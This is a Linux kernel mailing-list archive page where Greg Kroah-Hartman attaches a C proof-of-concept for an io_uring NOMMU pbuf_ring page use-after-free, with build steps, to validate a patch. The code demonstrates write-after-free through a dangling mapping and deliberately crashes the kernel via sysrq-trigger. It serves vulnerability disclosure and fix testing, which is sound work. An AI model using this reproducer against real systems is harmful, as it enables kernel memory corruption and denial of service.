From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: Jens Axboe <axboe@kernel.dk>
Cc: io-uring@vger.kernel.org
Subject: Re: [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps
Date: Tue, 21 Apr 2026 18:01:36 +0200 [thread overview]
Message-ID: <2026042140-arrogance-freehand-d8bd@gregkh> (raw)
In-Reply-To: <2026042108-fiscally-unglazed-56c7@gregkh>
[-- Attachment #1: Type: text/plain, Size: 2025 bytes --]
On Tue, Apr 21, 2026 at 03:55:38PM +0200, Greg Kroah-Hartman wrote:
> On Tue, Apr 21, 2026 at 07:50:32AM -0600, Jens Axboe wrote:
> > On 4/21/26 7:46 AM, Greg Kroah-Hartman wrote:
> > > Note, I have no way of testing this, I'm only forwarding this on because
> > > I got the bug report and was able to generate something that "seems"
> >
> > AI bug report I presume? Because I can't imagine anyone ever attempted
> > to run this.
>
> Yes, I got a bunch of "non-mmu" bug reports, which is a bit odd but I
> guess you can do that with qemu these days? I should dig into that,
> maybe that way I can test this and get a reproducer for you. If not,
> let's just bin the thing.
>
> > > correct, but it might be a total load of crap here, my knowledge of the
> > > vm layer is very low so take this for where it is coming from (i.e. a
> > > non-deterministic pattern matching system.)
> > >
> > > I do have another patch that just disables io_uring for !MMU systems, if
> > > you want that instead? Or is this feature something that !MMU devices
> > > actually care about?
> >
> > I mean, who really cares about !MMU in the first place, we should just
> > kill that off with a passion.
> >
> > Let me take a closer look at this and bounce it past some vm people, my
> > nommu knowledge is close to zero as it's never been relevant in my
> > professional life time. Which is saying something...
>
> Let me try to get a reproducer going first, let's not waste any more
> human time on this just yet, sorry for sending this out without that
> done first...
Ok, attached is a poc.c and a script to run it. If you run this on a
7.0 kernel today, it "should" crash. and then if you apply the patch it
doesn't (or at least that's what happened in my testing.)
Note, I have run this locally, and it seems to work, but be careful, I
can't guarantee anything, it does seem quite odd in that it "crashes"
the kernel with a sysrq call to show "proof". Although that is a cool
trick, I need to remember that...
thanks,
greg k-h
[-- Attachment #2: poc.c --]
[-- Type: text/plain, Size: 6740 bytes --]
// SPDX-License-Identifier: GPL-2.0
/*
* PoC for ANT-2026-02884: io_uring NOMMU pbuf_ring page use-after-free.
* Secondary: ANT-2026-02650 (duplicate vm_start) shares the same root
* cause but hits a mm/nommu.c BUG_ON that the fix does not address;
* this PoC targets 02884.
*
* Fixed by commit b4190296e84b ("io_uring: take page references for
* NOMMU pbuf_ring mmaps").
*
* Mechanism
* ---------
* Under !CONFIG_MMU, io_uring_get_unmapped_area() returns the kernel
* virtual address of the io_mapped_region's backing pages directly and
* io_uring_mmap() takes no page references. IORING_UNREGISTER_PBUF_RING
* -> io_put_bl()
* -> io_free_region()
* -> release_pages()
* therefore drops the only reference and the page returns to the buddy
* allocator while the user's VMA still has vm_start pointing into it.
* The user can read/write whatever the allocator hands out next.
*
* Detection: write a canary to the mmap'd page, unregister, re-read.
* Boot with init_on_free=1 so freed pages are zeroed; on a vulnerable
* kernel the canary becomes 0x00. On a fixed kernel io_uring_mmap()
* holds a get_page reference, release_pages() leaves refcount >= 1,
* the page is not freed, and the canary survives.
*
* On detection, demonstrate the write-after-free (re-allocate the page
* inside the kernel and observe it via the dangling pointer), then
* sysrq-crash so the qemu console shows an unambiguous kernel panic.
*
* Build (riscv64 nommu, nolibc, BINFMT_ELF_FDPIC loadable):
* make -C linux ARCH=riscv O=$PWD/build-nommu headers
* clang --target=riscv64-unknown-linux-gnu -march=rv64imac -mabi=lp64 \
* -mno-relax -static-pie -nostdlib -fno-stack-protector \
* -fno-builtin -isystem build-nommu/usr/include \
* -Ilinux/tools/include/nolibc -O2 -o poc poc.c \
* -fuse-ld=lld -Wl,--no-dynamic-linker -Wl,-N
*
* -isystem MUST come before nolibc so <asm/unistd.h> resolves to riscv,
* not the host's; -Wl,-N forces a single PT_LOAD so the FDPIC loader
* (which does not apply R_RISCV_RELATIVE) doesn't split text/data.
*
* Run as init under qemu-system-riscv64 -M virt -bios none.
* Required: CONFIG_MMU=n, CONFIG_IO_URING=y, CONFIG_MAGIC_SYSRQ=y,
* boot with init_on_free=1.
*/
/*
* binfmt_elf_fdpic's initial stack layout is not the SysV layout that
* nolibc's crt.h _start_c() expects; the auxv walk runs off into
* garbage. We don't need argc/argv/envp, so suppress crt.h and supply
* a minimal _start_c that just calls main. arch-riscv.h still provides
* the asm _start that calls _start_c.
*/
#define _NOLIBC_CRT_H
char **environ;
const unsigned long *_auxv;
#include "nolibc.h"
int main(void);
void _start_c(long *sp)
{
(void)sp;
exit(main());
}
#define __NR_io_uring_setup 425
#define __NR_io_uring_register 427
#define IORING_REGISTER_PBUF_RING 22
#define IORING_UNREGISTER_PBUF_RING 23
#define IORING_OFF_PBUF_RING 0x80000000ULL
#define IORING_OFF_PBUF_SHIFT 16
#define IOU_PBUF_RING_MMAP 1
#define PAGE_SIZE 4096
#define CANARY 0x55
struct io_sqring_offsets {
uint32_t head, tail, ring_mask, ring_entries, flags, dropped, array;
uint32_t resv1;
uint64_t user_addr;
};
struct io_cqring_offsets {
uint32_t head, tail, ring_mask, ring_entries, overflow, cqes, flags;
uint32_t resv1;
uint64_t user_addr;
};
struct io_uring_params {
uint32_t sq_entries, cq_entries, flags, sq_thread_cpu, sq_thread_idle;
uint32_t features, wq_fd, resv[3];
struct io_sqring_offsets sq_off;
struct io_cqring_offsets cq_off;
};
struct io_uring_buf_reg {
uint64_t ring_addr;
uint32_t ring_entries;
uint16_t bgid;
uint16_t flags;
uint64_t resv[3];
};
static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
return my_syscall2(__NR_io_uring_setup, entries, p);
}
static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr)
{
return my_syscall4(__NR_io_uring_register, fd, op, arg, nr);
}
static void die(const char *what, long ret)
{
printf("[-] %s: %ld\n", what, ret);
if (getpid() == 1) {
reboot(LINUX_REBOOT_CMD_POWER_OFF);
}
exit(1);
}
static void crash_kernel(void)
{
int fd = open("/proc/sysrq-trigger", O_WRONLY);
if (fd >= 0)
write(fd, "c", 1);
/* sysrq disabled or /proc missing — clean exit so qemu log is
* still parseable. */
reboot(LINUX_REBOOT_CMD_POWER_OFF);
}
int main(void)
{
struct io_uring_params p;
struct io_uring_buf_reg reg;
volatile unsigned char *ring;
int fd, ret, i, dirty;
if (getpid() == 1) {
mkdir("/proc", 0555);
mount("proc", "/proc", "proc", 0, NULL);
}
memset(&p, 0, sizeof(p));
fd = io_uring_setup(8, &p);
if (fd < 0)
die("io_uring_setup", fd);
memset(®, 0, sizeof(reg));
reg.ring_entries = 8;
reg.bgid = 0;
reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, ®, 1);
if (ret < 0)
die("REGISTER_PBUF_RING", ret);
ring = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
IORING_OFF_PBUF_RING | (0ULL << IORING_OFF_PBUF_SHIFT));
if (ring == MAP_FAILED)
die("mmap PBUF_RING", (long)ring);
printf("[*] pbuf_ring page mmap()ed at %p\n", ring);
for (i = 0; i < PAGE_SIZE; i++)
ring[i] = CANARY;
memset(®, 0, sizeof(reg));
reg.bgid = 0;
ret = io_uring_register(fd, IORING_UNREGISTER_PBUF_RING, ®, 1);
if (ret < 0)
die("UNREGISTER_PBUF_RING", ret);
printf("[*] unregistered; canary[0..3] = %02x %02x %02x %02x\n",
ring[0], ring[1], ring[2], ring[3]);
dirty = 0;
for (i = 0; i < PAGE_SIZE; i++)
if (ring[i] != CANARY)
dirty++;
if (!dirty) {
printf("[+] OK: canary intact — mmap holds page reference, "
"fix is applied\n");
munmap((void *)ring, PAGE_SIZE);
close(fd);
if (getpid() == 1)
reboot(LINUX_REBOOT_CMD_POWER_OFF);
return 0;
}
printf("[!] VULNERABLE: %d/%d canary bytes clobbered after unregister "
"(ring[0]=%02x, expected %02x) — page was freed under live mmap\n",
dirty, PAGE_SIZE, ring[0], CANARY);
/*
* Demonstrate write-after-free: scribble through the dangling
* mapping, then make the kernel allocate a fresh page. The pcp
* freelist is LIFO, so the just-freed page is handed straight
* back; we can observe the kernel's writes through our pointer.
*/
for (i = 0; i < PAGE_SIZE; i++)
ring[i] = 0x41;
memset(®, 0, sizeof(reg));
reg.ring_entries = 8;
reg.bgid = 1;
reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, ®, 1);
printf("[!] sprayed 0x41, re-registered bgid=1 (ret=%d); "
"ring[0..3] now %02x %02x %02x %02x — kernel reused the page\n",
ret, ring[0], ring[1], ring[2], ring[3]);
printf("[!] triggering sysrq crash\n");
if (getpid() == 1)
crash_kernel();
return 1;
}
[-- Attachment #3: run-poc.sh --]
[-- Type: application/x-sh, Size: 2871 bytes --]
next prev parent reply other threads:[~2026-04-21 16:01 UTC|newest]
Thread overview: 20+ messages / expand[flat|nested] mbox.gz Atom feed top
2026-04-21 13:46 [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps Greg Kroah-Hartman
2026-04-21 13:50 ` Jens Axboe
2026-04-21 13:55 ` Greg Kroah-Hartman
2026-04-21 14:02 ` Jens Axboe
2026-04-21 16:01 ` Greg Kroah-Hartman [this message]
2026-04-21 16:05 ` Jens Axboe
2026-04-21 16:21 ` Jens Axboe
2026-04-21 16:24 ` Greg Kroah-Hartman
2026-04-21 16:41 ` Jens Axboe
2026-04-21 17:04 ` Jens Axboe
2026-04-21 17:38 ` Jens Axboe
2026-04-21 17:39 ` Jens Axboe
2026-04-22 1:17 ` Jens Axboe
2026-04-22 1:56 ` Jens Axboe
2026-04-22 2:26 ` Jens Axboe
2026-04-22 5:36 ` Greg Kroah-Hartman
2026-04-22 8:11 ` Greg Kroah-Hartman
2026-04-22 12:40 ` Jens Axboe
2026-04-22 13:03 ` Greg Kroah-Hartman
2026-04-22 13:06 ` Jens Axboe
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=2026042140-arrogance-freehand-d8bd@gregkh \
--to=gregkh@linuxfoundation.org \
--cc=axboe@kernel.dk \
--cc=io-uring@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.